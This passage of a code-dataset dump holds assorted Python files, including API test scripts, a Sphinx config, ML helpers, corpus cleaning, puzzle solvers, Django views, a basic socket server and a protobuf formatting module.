\"method\": \"account_history_api.get_ops_in_block\",\n \"params\": { \"block_num\": i, \"only_virtual\": False }\n } ), \"utf-8\" ) + b\"\\r\\n\"\n\n with ThreadPoolExecutor(max_workers=2) as executor:\n #with ProcessPoolExecutor(max_workers=2) as executor:\n future1 = executor.submit(cloutd_call, url1, data=request, max_tries=max_tries, timeout=timeout)\n future2 = executor.submit(cloutd_call, url2, data=request, max_tries=max_tries, timeout=timeout)\n\n status1, json1 = future1.result()\n status2, json2 = future2.result()\n \n #status1, json1 = cloutd_call(url1, data=request, max_tries=max_tries, timeout=timeout)\n #status2, json2 = cloutd_call(url2, data=request, max_tries=max_tries, timeout=timeout)\n \n if status1 == False or status2 == False or json1 != json2:\n print(\"Difference @block: {}\\n\".format(i))\n errors += 1\n \n filename = wdir / Path(str(f_block) + \"_\" + str(l_block) + \".log\")\n try: file = filename.open( \"w\" )\n except: print( \"Cannot open file:\", filename ); return\n \n file.write(\"Difference @block: {}\\n\".format(i))\n file.write(\"{} response:\\n\".format(url1))\n json.dump(json1, file, indent=2, sort_keys=True)\n file.write(\"\\n\")\n file.write(\"{} response:\\n\".format(url2))\n json.dump(json2, file, indent=2, sort_keys=True)\n file.write(\"\\n\")\n file.close()\n print( \"Compare blocks [{} : {}] break with error\".format(f_block, l_block) )\n return\n\n print( \"Compare blocks [{} : {}] finished\".format(f_block, l_block) )\n\n \nif __name__ == \"__main__\":\n main()\n","sub_path":"python_scripts/tests/api_tests/test_ah_get_ops_in_block.py","file_name":"test_ah_get_ops_in_block.py","file_ext":"py","file_size_in_byte":5264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"217779442","text":"# Configuration file for the Sphinx documentation builder.\n\nimport os\nimport sys\nimport re\n\nfrom datetime import datetime\n\n# -- Path setup --------------------------------------------------------------\n\nsys.path.insert(0, os.path.abspath('../'))\npath = os.path.abspath(os.path.dirname(__file__))\n\n\n# -- Project information -----------------------------------------------------\n\nproject = 'Lentil'\nauthor = 'Andy Kee'\ncopyright = f'{datetime.now().year} California Institute of Technology'\n\nwith open(os.path.normpath(os.path.join(path, '..', 'lentil', '__init__.py'))) as f:\n version = release = re.search(\"__version__ = '(.*?)'\", f.read()).group(1)\n\n\n# -- General configuration ---------------------------------------------------\n\nextensions = ['sphinx.ext.autodoc',\n 'sphinx.ext.autosummary',\n 'sphinx.ext.mathjax',\n 'sphinx.ext.napoleon',\n 'sphinx.ext.viewcode']\ntemplates_path = ['_templates']\nsource_suffix = '.rst'\nmaster_doc = 'index'\nexclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']\n\n\n# -- Options for HTML output -------------------------------------------------\n\nhtml_theme = 'pydata_sphinx_theme'\nhtml_theme_options = {\n 'show_prev_next': False,\n 'google_analytics_id': 'UA-180546240-1',\n 'github_url': 'https://github.com/andykee/lentil'\n}\nhtml_logo = '_static/img/lentil.png'\n\nhtml_additional_pages = {\n 'index': 'indexcontent.html'\n}\n\nhtml_static_path = ['_static']\nhtml_show_sphinx = False\nhtml_show_sourcelink = False\nhtml_scaled_image_link = False\n\nhtml_js_files = ['js/copybutton.js']\nhtml_css_files = ['css/lentil.css', 'css/syntax-highlighting.css']\n\npygments_style = 'default'\n\n# if true, the current module name will be prepended to all description\n# unit titles (such as .. function::).\nadd_module_names = True\n\nautodoc_default_options = {\n 'member-order': 'alphabetical',\n 'exclude-members': '__init__, __weakref__, __dict__, __module__'\n}\n\nautosummary_generate = True\n","sub_path":"docs/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":1973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"252195999","text":"\"\"\"\n Changes from our original framework (series 3b):\n - def cross_validate(create_classifier, training_set, number_of_groups):\n - def get_predictions(classifier, datapoints):\n\"\"\"\n\nfrom __future__ import division\n\n# import itertools\nimport numpy\nimport copy\n\ndef graph_results():\n return 0\n\n\ndef test_kernel(kernel_constructor, kernel_options, show_kernel_option,\n training_set, test_set, number_of_groups):\n \"\"\"\n create a kernel for each kernel_option and test it on the datasets\n :param kernel_options: a dictionary of constructor params for the kernel\n :param show_kernel_options: a function that pretty prints kernel options\n :param training_set: list of DataPoint to train from\n :param test_set: list of DataPoint to test the kernel on\n :param number_of_groups: the number of groups for cross-validation\n \"\"\"\n\n print (\"\\ncross-validating...\")\n\n best_result = 0, None\n\n for kernel_option in kernel_options:\n accuracy = cross_validate(\n kernel_constructor(kernel_option),\n training_set,\n number_of_groups)\n\n print (show_kernel_option(kernel_option, accuracy))\n\n if accuracy >= best_result[0]:\n best_result = accuracy, kernel_option\n\n best_accuracy, best_kernel_option = best_result\n\n print (\"\\nbest result:\")\n print (show_kernel_option(best_kernel_option, best_accuracy))\n classifier = kernel_constructor(best_kernel_option)()\n accuracy = run_single_test(classifier, training_set, test_set)\n print (\"best parameters applied to test \"\n \"set give accuracy of {0}\".format(accuracy))\n\n\ndef train_classifier(classifier, datapoints):\n \"\"\"\n takes a classifier and trains it on the passed data points\n \"\"\"\n training_data = numpy.array([item.feature_array for item in datapoints])\n class_labels = numpy.array([item.value for item in datapoints])\n classifier.fit(training_data, class_labels)\n\n\ndef test_classifier(classifier, datapoints):\n \"\"\"\n takes a classifier, predicts values of the passed datapoints\n and then compares the predictions with their real values\n returns the accuracy of the predictions as a fraction\n \"\"\"\n test_data = numpy.array([item.feature_array for item in datapoints])\n predictions = classifier.predict(test_data)\n result = zip(predictions, [item.value for item in datapoints])\n correct_answers = sum(\n [1 if prediction == value\n else 0\n for prediction, value\n in result])\n accuracy = correct_answers / len(predictions)\n return accuracy\n\n\ndef run_single_test(classifier, training_set, test_set):\n \"\"\"\n trains the classifier on the training set\n then returns its accuracy on the test set\n \"\"\"\n train_classifier(classifier, training_set)\n accuracy = test_classifier(classifier, test_set)\n return accuracy\n\n\ndef cross_validate(create_classifier, training_set, number_of_groups):\n \"\"\"\n takes a functions that can be called to create a classifier (as multiple\n classifiers will need to be created) and a number of groups. It divides\n the training set into that many subgroups and does cross-validation on them\n returns the average accuracy for predicting all groups\n \"\"\"\n accuracy_sum = 0\n classifier = create_classifier()\n best_classifier = copy.deepcopy(classifier) \n best_accuracy = 0 \n for iteration in range(number_of_groups):\n testing_subset = training_set[iteration::number_of_groups]\n training_subset = [item\n for item\n in training_set\n if item not in testing_subset]\n accuracy = run_single_test(classifier, training_subset, testing_subset)\n print(accuracy)\n if (accuracy > 0.95 * best_accuracy):\n print(\".\")\n best_accuracy = accuracy\n best_classifier = copy.deepcopy(classifier)\n else:\n classifier = copy.deepcopy(best_classifier)\n accuracy_sum += accuracy\n return (accuracy_sum / number_of_groups) , best_classifier\n\ndef get_predictions(classifier, datapoints):\n \"\"\"\n A new function based on our framework, this will return the predicted labels\n :param classifier: a constructed classifier with its respectively parameters \n :datapoint: the test data without the target labels \n \"\"\" \n #classifier = create_classifier() \n test_feature_vector = numpy.array([item.feature_array for item in datapoints])\n predictions = classifier.predict(test_feature_vector)\n return predictions\n","sub_path":"mnist_test/03_b - MLP/classifiers.py","file_name":"classifiers.py","file_ext":"py","file_size_in_byte":4634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"126796492","text":"__author__ = 'yuhuan'\n\nfrom nlp.utilities import *\nfrom nlp.io.file import *\n\nimport sys\n\n\ndef filter_by_length_word(source_sentences, target_sentences, min_length, max_length):\n for source_sentence, target_sentence in zip(source_sentences, target_sentences):\n if min_length <= count_words(source_sentence) <= max_length:\n yield (source_sentence, target_sentence)\n\n\ndef filter_by_length_char(source_sentences, target_sentences, min_length, max_length):\n for source_sentence, target_sentence in zip(source_sentences, target_sentences):\n if min_length <= len(source_sentence) <= max_length:\n yield (source_sentence, target_sentence)\n\n\ndef do_trimming(sources, targets, minimum_length, maximum_length, granularity, filter_on):\n if filter_on == \"source\" and granularity == \"char\":\n filtered_sentences = filter_by_length_char(sources, targets, minimum_length, maximum_length)\n elif filter_on == \"source\" and granularity == \"word\":\n filtered_sentences = filter_by_length_word(sources, targets, minimum_length, maximum_length)\n elif filter_on == \"target\" and granularity == \"char\":\n filtered_sentences = filter_by_length_char(targets, sources, minimum_length, maximum_length)\n elif filter_on == \"target\" and granularity == \"word\":\n filtered_sentences = filter_by_length_word(targets, sources, minimum_length, maximum_length)\n\n # TODO: figure out why list comprehension does not work!\n filtered_source_sentences = []\n filtered_target_sentences = []\n for s, t in filtered_sentences:\n filtered_source_sentences.append(s)\n filtered_target_sentences.append(t)\n\n if filter_on == \"source\":\n return filtered_source_sentences, filtered_target_sentences\n if filter_on == \"target\":\n return filtered_target_sentences, filtered_source_sentences\n\n\ndef do_empty_line_removing(sources, targets):\n new_source_lines = []\n new_target_lines = []\n for (s, t) in zip(sources, targets):\n if s.strip() != '' and t.strip() != '':\n new_source_lines.append(s)\n new_target_lines.append(t)\n\n return new_source_lines, new_target_lines\n\n\ndef do_bars_removing(sources, targets):\n regex_contains_bar = re.compile(r'\\|')\n new_source_lines = []\n new_target_lines = []\n for (s, t) in zip(sources, targets):\n if len(regex_contains_bar.findall(s)) == 0 and len(regex_contains_bar.findall(t)) == 0:\n new_source_lines.append(s)\n new_target_lines.append(t)\n\n return new_source_lines, new_target_lines\n\n\ndef do_private_area_char_removal(sources, targets):\n regex_private_char = re.compile(r'[\\ue000-\\uf8ff]+')\n new_source_lines = [regex_private_char.sub('', line) for line in sources]\n new_target_lines = [regex_private_char.sub('', line) for line in targets]\n return new_source_lines, new_target_lines\n\n\ndef do_full_width_to_half_width(sources, targets):\n regex_full_width_char = re.compile(u\"[\\uff01-\\uff5e]+\")\n new_source_lines = [regex_full_width_char.sub(full_to_half, l) for l in sources]\n new_target_lines = [regex_full_width_char.sub(full_to_half, l) for l in targets]\n return new_source_lines, new_target_lines\n\n\nif __name__ == '__main__':\n\n if len(sys.argv) < 9:\n print('''\n Usage:\n You must provide all following parameters in the order listed:\n (1) Path to the file that contains source language sentences.\n (2) Path to the file that contains target language sentences.\n (3) Path for me to output the new source language sentences.\n (4) Path for me to output the new target language sentences.\n (5) Which sentences should I count to check length?\n - Say \"source\" to limit length based on source sentences.\n - Say \"target\" to limit length based on target sentences.\n (6) How do I count the length of sentence?\n - Say \"word\", and I'll count by word (using space as delimiter)\n - Say \"char\", and I'll count by characters (using len())\n (7) Min value of desired length.\n (7) Max value of desired length.\n\n Example:\n python3 clean_bitext.py corpus.en corpus.zh corpus.clean.en corpus.clean.zh target char 10 80\n\n ''')\n exit()\n\n source_file_input = sys.argv[1]\n target_file_input = sys.argv[2]\n\n source_file_output = sys.argv[3]\n target_file_output = sys.argv[4]\n\n sentence_length_limit_is_on = sys.argv[5] # \"target\" or \"source\"\n sentence_length_limit_granularity = sys.argv[6] # \"char\" # or \"word\"\n sentence_length_limit_min = int(sys.argv[7])\n sentence_length_limit_max = int(sys.argv[8])\n\n temp_source_lines = open(source_file_input)\n temp_target_lines = open(target_file_input)\n\n temp_source_lines, temp_target_lines = do_trimming(temp_source_lines, temp_target_lines, sentence_length_limit_min, sentence_length_limit_max, sentence_length_limit_granularity, sentence_length_limit_is_on)\n temp_source_lines, temp_target_lines = do_empty_line_removing(temp_source_lines, temp_target_lines)\n temp_source_lines, temp_target_lines = do_bars_removing(temp_source_lines, temp_target_lines)\n temp_source_lines, temp_target_lines = do_private_area_char_removal(temp_source_lines, temp_target_lines)\n temp_source_lines, temp_target_lines = do_full_width_to_half_width(temp_source_lines, temp_target_lines)\n\n write_lines(source_file_output, temp_source_lines)\n write_lines(target_file_output, temp_target_lines)\n\n","sub_path":"clean_bitext.py","file_name":"clean_bitext.py","file_ext":"py","file_size_in_byte":5503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"303252507","text":"print(\"Ejercicio 3.17. Vinos.\")\nTIPO1 = 0\nTIPO2 = 0\nTIPO3 = 0\nTIPO4 = 0\nTIPO5 = 0\nMCTIPO2 = 0\nAÑO = 0\nN = int(input(\"Cuantos anos de datos se van a ingresar?: \"))\nfor i in range(1, N+1, 1) :\n TOTVIN = 0\n for J in range(1, 6, 1) :\n V=float(input(f\"Cantidad de vino del tipo {J} producido en el anio {i}: \"))\n TOTVIN += V\n if J == 1 :\n TIPO1 += V\n elif J == 2 :\n TIPO2 += V\n if V > MCTIPO2 :\n MCTIPO2 = V\n AÑO = i\n elif J == 3 :\n TIPO3 += V\n if V == 0 :\n print(f\"--El anio {i} no se produjo vino tipo 3\")\n elif J == 4 :\n TIPO4 += V\n elif J == 5 :\n TIPO5 += V\n\n print(f\"--Total de vino producido en el anio: {TOTVIN} litros\")\n\nprint(\"-------------------\")\nprint(f\"Total producido de vino tipo 1: {TIPO1} litros.\")\nprint(f\"Total producido de vino tipo 2: {TIPO2} litros.\")\nprint(f\"Total producido de vino tipo 3: {TIPO3} litros.\")\nprint(f\"Total producido de vino tipo 4: {TIPO4} litros.\")\nprint(f\"Total producido de vino tipo 5: {TIPO5} litros.\")\n\nprint(\"\")\nprint(f\"La mayor cantidad de vino tipo 2 se produjo en el anio {AÑO}, con {MCTIPO2} litros.\")\nprint(\"Fin del programa\")\n","sub_path":"libro/problemas_resueltos/Capítulo_3/3_16.py","file_name":"3_16.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"643102485","text":"#Import the necessary libraries\nfrom time import time\nfrom queue import Queue\nclass Puzzle:\n #Setting the goal state of 8-puzzle \n goal_state=[1,2,3,8,0,4,7,6,5]\n num_of_instances=0\n #constructor to initialize the class members\n def __init__(self,state,parent,action):\n self.parent=parent\n self.state=state\n self.action=action\n \n #TODO: incrementing the number of instance by 1\n Puzzle.num_of_instances+= 1\n \n #function used to display a state of 8-puzzle\n def __str__(self):\n return str(self.state[0:3])+'\\n'+str(self.state[3:6])+'\\n'+str(self.state[6:9])\n\n #method to compare the current state with the goal state\n def goal_test(self):\n #TODO: include a condition to compare the current state with the goal state\n if self.state == self.goal_state:\n return True\n return False\n \n #static method to find the legal action based on the current board position\n @staticmethod\n def find_legal_actions(i,j):\n legal_action = ['U', 'D', 'L', 'R']\n if i == 0: \n # if row is 0 in board then up is disable\n legal_action.remove('U')\n elif i == 2: \n legal_action.remove('D')\n\n #TODO: down is disable\n if j == 0:\n legal_action.remove('L')\n\n #TODO: Left is disable \n elif j == 2:\n legal_action.remove('R')\n\n #TODO: Right is disable\n return legal_action\n\n #method to generate the child of the current state of the board\n def generate_child(self):\n #TODO: create an empty list\n children=[]\n x = self.state.index(0)\n i = int(x / 3)\n j = int(x % 3)\n #TODO: call the method to find the legal actions based on i and j values\n legal_actions=self.find_legal_actions(i,j);\n\n #TODO:Iterate over all legal actions \n for action in legal_actions:\n new_state = self.state.copy()\n #if the legal action is UP\n if action == 'U':\n #Swapping between current index of 0 with its up element on the board\n new_state[x], new_state[x-3] = new_state[x-3], new_state[x]\n elif action == 'D':\n #TODO: Swapping between current index of 0 with its down element on the board\n new_state[x], new_state[x+3] = new_state[x+3], new_state[x]\n elif action == 'L':\n #TODO: Swapping between the current index of 0 with its left element on the board\n new_state[x], new_state[x-1] = new_state[x-1], new_state[x]\n elif action == 'R':\n #TODO: Swapping between the current index of 0 with its right element on the board\n new_state[x], new_state[x+1] = new_state[x+1], new_state[x]\n children.append(Puzzle(new_state,self,action))\n #TODO: return the children\n return children\n #method to find the solution\n def find_solution(self):\n solution = []\n solution.append(self.action)\n path = self\n while path.parent != None:\n path = path.parent\n solution.append(path.action)\n solution = solution[:-1]\n solution.reverse()\n return solution\n#method for breadth first search\n#TODO: pass the initial_state as parameter to the breadth_first_search method \ndef breadth_first_search(initial_state):\n start_node = Puzzle(initial_state, None, None)\n print(\"Initial state:\")\n print(start_node)\n if start_node.goal_test():\n return start_node.find_solution()\n q = Queue()\n #TODO: put start_node into the Queue\n q.put(start_node)\n #TODO: create an empty list of explored nodes\n explored=[]\n #TODO: Iterate the queue until empty. Use the empty() method of Queue\n while not(q.empty()):\n #TODO: get the current node of a queue. Use the get() method of Queue\n node=q.get()\n #TODO: Append the state of node in the explored list as node.state\n explored.append(node.state)\n #TODO: call the generate_child method to generate the child nodes of current node\n children=node.generate_child()\n #TODO: Iterate over each child node in children\n for child in children:\n if child.state not in explored:\n if child.goal_test():\n return child.find_solution()\n q.put(child)\n return\n#Start executing the 8-puzzle with setting up the initial state\n#Here we have considered 3 initial state intitalized using state variable\nfrom time import time\nfrom queue import Queue\n\n\nstate=[[1, 3, 4,\n 8, 6, 2,\n 7, 0, 5],\n\n [2, 8, 1,\n 0, 4, 3,\n 7, 6, 5],\n\n [2, 8, 1,\n 4, 6, 3,\n 0, 7, 5]]\n#Iterate over number of initial_state\nfor i in range(0,3):\n #TODO: Initialize the num_of_instances to zero\n Puzzle.num_of_instances=0\n #Set t0 to current time\n t0=time()\n bfs=breadth_first_search(state[i])\n #Get the time t1 after executing the breadth_first_search method\n t1=time()-t0\n print('BFS:', bfs)\n print('space:',Puzzle.num_of_instances)\n print('time:',t1)\n print()\nprint('------------------------------------------')\n","sub_path":"BFSSPG.py","file_name":"BFSSPG.py","file_ext":"py","file_size_in_byte":5256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"342879168","text":"from enum import Enum\n\n\nclass Dir(Enum):\n UP = 0\n DOWN = 1\n LEFT = 2\n RIGHT = 3\n\n\ndef get_cell(grid, x, y):\n try:\n return grid[y][x]\n except IndexError:\n return None\n\n\ndef is_empty(v):\n return v is None or v == ' '\n\n\ndef follow_path(grid, x, y, dir):\n letters = []\n steps = 0\n\n while True:\n c = get_cell(grid, x, y)\n if is_empty(c):\n return letters, steps\n\n steps += 1\n if c == '+':\n if dir in (Dir.UP, Dir.DOWN):\n if not is_empty(get_cell(grid, x-1, y)):\n x = x-1\n dir = Dir.LEFT\n else:\n x = x+1\n dir = Dir.RIGHT\n else:\n if not is_empty(get_cell(grid, x, y-1)):\n y = y-1\n dir = Dir.UP\n else:\n y = y+1\n dir = Dir.DOWN\n else:\n if c not in ('-', '|'):\n letters.append(c)\n\n if dir == Dir.UP:\n y = y-1\n elif dir == Dir.DOWN:\n y = y+1\n elif dir == Dir.LEFT:\n x = x-1\n elif dir == Dir.RIGHT:\n x = x+1\n\n\ndef main():\n grid = []\n with open('day19.input.txt') as f:\n for line in f.readlines():\n grid.append([c for c in line.rstrip('\\n')])\n\n letters, steps = follow_path(grid, 1, 0, Dir.DOWN)\n print(''.join(letters))\n print(steps)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"day19.py","file_name":"day19.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"309646580","text":"import socket\n\nhost = 'Your PC IP address'\nport = 12321\n\n\ndef main():\n sock = socket.socket()\n\n sock.bind((host, port))\n\n sock.listen(1)\n print(\"sever listening...\")\n\n while True:\n (connection, address) = sock.accept()\n print(\"connection to client successful\")\n \n sock.listen(1)\n print(\"\\nwaiting for request...\")\n request = connection.recv(1024)\n print(bytes.decode(request))\n\n print(\"Message from connected client: \" + bytes.decode(request))\n \n connection.close()\n print(\"+--connection to client closed--+\") \n\nif __name__ == \"__main__\":\n main()\n","sub_path":"Simple-Client-to-Server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"288667259","text":"#kullanıcıdan 2 adet 3 basmaklı sayı al, 2si de polindromsa topla, biri polindromsa çıkar, eğer ikiside pol değilse çarp\n#BEYZA FİRDEVS SUBAŞI 180401047\n\nx = int(input(\"3 basamaklı bir sayı giriniz: \"))\nz = int(input(\"3 basamaklı bir sayı giriniz: \"))\n\ny1 = int(x/100)\nx = int(x-(y1*100))\no1 = int(x/10)\nx = int(x-(o1*10))\nb1 =int(x)\n\ny = int(z/100)\nz = int (z-(y*100))\no = int (z/10)\nz = int (z-(o*10))\nb =int (z)\n\n\nif(y1==b1 and y==b):\n print(\"Polindrom sayılardır ve iki sayının toplamı: \",(100*y1+10*o1+b1) + (100*y+10*o+b))\n\nelif(y1==b1 or y==b):\n\n if(y>y1):\n y1,y=y,y1\n o1,o=o,o1\n b1,b=b,b1\n\n\n print(\"Bir adet polindrom sayı vardır ve iki sayının farkı: \",(100*y1+10*o1+b1) - (100*y+10*o+b))\n\nelse:\n print(\"Polindrom sayılar değildir ve iki sayının çarpımı: \",(100*y1+10*o1+b1) * (100*y+10*o+b))\n","sub_path":"MY_EXERCISE/2-polindrom.py","file_name":"2-polindrom.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"427011361","text":"from django.shortcuts import render,redirect\r\nfrom django.views.generic.base import View\r\nfrom django.http import HttpResponse,JsonResponse\r\nfrom pure_pagination import Paginator,EmptyPage,PageNotAnInteger\r\nfrom django.db.models import Q\r\n\r\nfrom users.models import UserProfile\r\nfrom operation.models import UserFavorite,CourseComments,UserCourse\r\nfrom .models import Course,CourseResource,Video\r\n# Create your views here.\r\nclass CourseListView(View):\r\n def get(self,request):\r\n Flag = 3\r\n id = request.session.get(\"id\")\r\n user_obj = UserProfile.objects.filter(id=id).first()\r\n\r\n all_course=Course.objects.all()\r\n #进行搜索功能\r\n search_keywords=request.GET.get(\"keywords\",\"\")\r\n if search_keywords:\r\n all_course=Course.objects.filter(Q(name__icontains=search_keywords)\r\n |Q(tag__icontains=search_keywords)\r\n |Q(desription__icontains=search_keywords)).all()\r\n hot_course=all_course.order_by(\"-click_total\").all()[:3]\r\n #根据最新和课程点击数以及学习人数进行筛选\r\n #获取sort==students学习人数\r\n s_stu=request.GET.get(\"sort\")\r\n if s_stu==\"students\":\r\n all_course=all_course.order_by(\"-students\").all()\r\n elif s_stu==\"hot\":\r\n all_course = all_course.order_by(\"-click_total\").all()\r\n else:\r\n all_course=all_course.order_by(\"-add_time\").all()\r\n\r\n #分页-利用django的pure-pagination\r\n try:\r\n page=request.GET.get(\"page\",1)\r\n except PageNotAnInteger:\r\n page=1\r\n p=Paginator(all_course,12,request=request)#数据集,每页12条数据\r\n courses=p.page(page)#第几页,自动实现跳转第几页\r\n return render(request,\"course-list.html\",locals())\r\n#课程详细信息(访问一次 点击量就+1)\r\nclass CourseDetailView(View):\r\n def get(self,request,course_id=1):\r\n Flag=3\r\n id = request.session.get(\"id\")\r\n if id:\r\n user_obj = UserProfile.objects.filter(id=id).first()\r\n course_obj=Course.objects.filter(id=int(course_id)).first()\r\n #访问量+1\r\n course_obj.click_total+=1\r\n course_obj.save()\r\n #查看机构是否已经收藏\r\n user_fav=UserFavorite.objects.filter(fav_type=2,user_id=id,fav_id=course_obj.courseorg_id).first()\r\n print(user_fav)\r\n #查看课程是否已经收藏\r\n cour_fav=UserFavorite.objects.filter(fav_type=1,user_id=id,fav_id=course_id).first()\r\n #相关课程\r\n if course_obj.tag:\r\n tag_obj=Course.objects.filter(~Q(id=course_id)&Q(tag__icontains=course_obj.tag)).all()[:1]\r\n else:\r\n tag_obj=[]\r\n\r\n return render(request,\"course-detail.html\",locals())\r\n else:\r\n return redirect(\"/login/\")\r\n\r\n#课程的视频信息\r\nclass CoursVideoView(View):\r\n def get(self,request,course_id):\r\n Flag=3\r\n id=request.session.get(\"id\")\r\n user_obj=UserProfile.objects.filter(id=id).first()\r\n if user_obj:\r\n #开始读取页面\r\n course_obj=Course.objects.filter(id=course_id).first()\r\n uc_obj=UserCourse.objects.filter(user_id=id,course_id=course_id).first()\r\n if uc_obj:\r\n pass #已经在学习\r\n else:\r\n u_course=UserCourse()\r\n u_course.user_id=id\r\n u_course.course_id=course_id\r\n u_course.save()\r\n #课程表学习人数加1\r\n course_obj.students+=1\r\n course_obj.save()\r\n #资源下载\r\n all_resource=CourseResource.objects.filter(course_id=course_id).all()\r\n if course_obj:\r\n #存在课程\r\n return render(request,\"course-video.html\",locals())\r\n else:\r\n return redirect(\"/course/list/\",locals())\r\n else:\r\n return redirect(\"/login/\")\r\n#课程的评论信息\r\nclass CoursCommentView(View):\r\n def get(self,request,course_id):\r\n Flag = 3\r\n id = request.session.get(\"id\")\r\n user_obj = UserProfile.objects.filter(id=id).first()\r\n if user_obj:\r\n # 开始读取页面\r\n course_obj = Course.objects.filter(id=course_id).first()\r\n # 资源下载\r\n all_resource = CourseResource.objects.filter(course_id=course_id).all()\r\n if course_obj:\r\n #评论\r\n comments=CourseComments.objects.filter(course_id=course_id).order_by(\"-add_time\").all()\r\n else:\r\n return redirect(\"/course/list/\", locals())\r\n else:\r\n return redirect(\"/login/\")\r\n return render(request,\"course-comment.html\",locals())\r\n\r\n\r\n#发表评论\r\nclass AddCommentView(View):\r\n def post(self,request):\r\n id=request.session.get(\"id\")\r\n course_id=request.POST.get(\"course_id\")\r\n comments=request.POST.get(\"comments\")\r\n if id:\r\n comm=CourseComments()\r\n comm.course_id=course_id\r\n comm.user_id=id\r\n comm.comments=comments\r\n comm.save()\r\n message=\"发表成功\"\r\n return HttpResponse(message)\r\n else:\r\n return redirect(\"/login/\")\r\n\r\nclass VideoPlayView(View):\r\n def get(self,request):\r\n Flag = 3\r\n id = request.session.get(\"id\")\r\n course_id=request.GET.get(\"course_id\")\r\n lesson_id=request.GET.get(\"lesson_id\")\r\n viid=request.GET.get(\"vi_id\")\r\n user_obj = UserProfile.objects.filter(id=id).first()\r\n if user_obj:\r\n # 开始读取页面\r\n course_obj = Course.objects.filter(id=int(course_id)).first()\r\n print(course_obj.id)\r\n #####根据id和课程查询要播放的视频信息第几章的第几个视频\r\n video_play_obj=Video.objects.filter(id=viid).first()\r\n all_resource = CourseResource.objects.filter(course_id=course_obj.id).all()\r\n if course_obj:\r\n # 存在课程\r\n return render(request, \"course_play.html\", locals())\r\n else:\r\n return redirect(\"/course/list/\", locals())\r\n else:\r\n return redirect(\"/login/\")","sub_path":"OnlineStudy/apps/courses/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"305265143","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 23 17:14:57 2018\n\n@author: Heqi\n\"\"\"\nimport os\n\ndef model(input_dir,r):\n os.system(\"main.py --data_test Demo --scale \"+r +\"--pre_train ../experiment/model/EDSR_baseline_x\"+r+\".pt --test_only --save_results\"+\"--dir_demo\" + input_dir)\n \ninput_dir = \"../cityscape_input\"\nr = 2\nmodel(input_dir,r)","sub_path":"code/mode_run.py","file_name":"mode_run.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"180196699","text":"import datetime\nimport os\nif (os.name == \"nt\"):\n\timport winsound\n\ndef notification():\n if (os.name == \"nt\"):\n \twinsound.Beep(300,500)\n else:\n \tos.system('play --no-show-progress --null --channels 1 synth %s sine %f' % ( 0.5, 300))\n\ndef createLogFile(experimentName):\n\n date = datetime.datetime.now()\n fname = \"log/{}_{}_{}_{}_{}.log\".format(experimentName, date.month, date.day, date.hour, date.minute)\n\n logfile = open(fname, \"w\")\n logfile.write(\"Episode\\tReward\\tStep number\\n\")\n\n return logfile\n","sub_path":"agent/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"569567807","text":"\"\"\"Contains routines for printing protocol messages in JS object format.\n\nNote: This is *not* JSON format, but the format compatible with\nfromObject() toObject() of the JS runtime library.\n\nSee src/google/protobuf/compiler/js/js_generator.cc.\n\nAdapted from json_format.py.\n\nSimple usage example:\n\n # Create a proto object and serialize it to JS object string.\n message = my_proto_pb2.MyMessage(foo='bar')\n js_object_string = js_object_format.MessageToJsObject(message)\n\n # Parse a proto in JS object string format to proto object.\n message = js_object_format.Parse(js_object_string, my_proto_pb2.MyMessage())\n\"\"\"\n\ntry:\n from collections import OrderedDict\nexcept ImportError:\n from ordereddict import OrderedDict #PY26\nimport base64\nimport json\nimport math\nimport re\nimport six\nimport sys\n\nfrom google.protobuf import descriptor\n\n_TIMESTAMPFOMAT = '%Y-%m-%dT%H:%M:%S'\n_INT_TYPES = frozenset([descriptor.FieldDescriptor.CPPTYPE_INT32,\n descriptor.FieldDescriptor.CPPTYPE_UINT32,\n descriptor.FieldDescriptor.CPPTYPE_INT64,\n descriptor.FieldDescriptor.CPPTYPE_UINT64])\n_INT64_TYPES = frozenset([descriptor.FieldDescriptor.CPPTYPE_INT64,\n descriptor.FieldDescriptor.CPPTYPE_UINT64])\n_FLOAT_TYPES = frozenset([descriptor.FieldDescriptor.CPPTYPE_FLOAT,\n descriptor.FieldDescriptor.CPPTYPE_DOUBLE])\n_INFINITY = 'Infinity'\n_NEG_INFINITY = '-Infinity'\n_NAN = 'NaN'\n\n_UNPAIRED_SURROGATE_PATTERN = re.compile(six.u(\n r'[\\ud800-\\udbff](?![\\udc00-\\udfff])|(? int:\n x = 0\n y = 0\n direction = (0, 1)\n\n lines = s.splitlines()\n for line in lines:\n d = line[0]\n n = int(line[1:])\n\n if d == 'N':\n y -= n\n elif d == 'S':\n y += n\n elif d == 'E':\n x += n\n elif d == 'W':\n x -= n\n elif d == 'L':\n rotations = n // 90\n ind = DIRECTIONS.index(direction)\n direction = DIRECTIONS[(ind - rotations) % 4]\n elif d == 'R':\n rotations = n // 90\n ind = DIRECTIONS.index(direction)\n direction = DIRECTIONS[(ind + 